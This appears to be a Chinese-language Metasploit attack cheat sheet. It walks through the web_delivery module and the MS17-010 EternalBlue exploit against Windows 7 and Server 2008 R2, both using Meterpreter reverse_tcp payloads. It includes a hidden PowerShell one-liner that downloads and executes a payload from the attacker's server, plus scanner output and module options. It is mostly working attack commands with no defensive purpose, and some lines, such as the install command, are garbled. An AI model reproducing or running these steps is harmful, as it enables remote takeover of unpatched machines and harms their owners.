MSF 介绍



最好使用这种方法安装,安装后自己安装portsql,可以使用fast serach进行漏洞查询
curl > msfinstall chmod 755 msfinstall
./msfinstall MSF web_delivery

msf > use exploit/multi/script/web_delivery  
- 设置目标是什么系统,好升生成不同的PHP/PYTHON/POWERSHELL
msf exploit(web_delivery) > set target 2  
target => 2  
- 生成反弹payload
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp  
payload => windows/meterpreter/reverse_tcp  
- 在服务器上开启要被访问的URL
msf exploit(web_delivery) > set SRVPORT 8081  
SRVPORT => 8081  
msf exploit(web_delivery) > set URIPATH /  
URIPATH => /  
msf exploit(web_delivery) > set lhost ip  #外网ip地址  
lhost => ip  
- 开启反弹shell的连接iP和端口
msf exploit(web_delivery) > set lport 6666  
lport => 6666  
msf exploit(web_delivery) > run  
[*] Exploit running as background job.
[*] Started reverse TCP handler on
msf exploit(web_delivery) > [*] Using URL:  
[*] Local IP:
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://外网ip:8081/');  

[+] - Host is likely VULNERABLE to MS17-010! (Windows Server 2008 R2 Enterprise 7601 Service Pack 1) [!] - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x32752EAF use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS -
set threads 100

msf > use exploit/windows/smb/ms17_010_eternalblue  
msf exploit(ms17_010_eternalblue) > set rhost  
msf exploit(ms17_010_eternalblue) > options  
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp  
msf exploit(ms17_010_eternalblue) > set lhost 本机ip  
msf exploit(ms17_010_eternalblue) > set lport 本机监听port  
msf exploit(ms17_010_eternalblue) > run -j  
Module options (exploit/windows/smb/ms17_010_eternalblue):  
   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):  
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: , seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     6666             yes       The listen port

Exploit target:  
   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs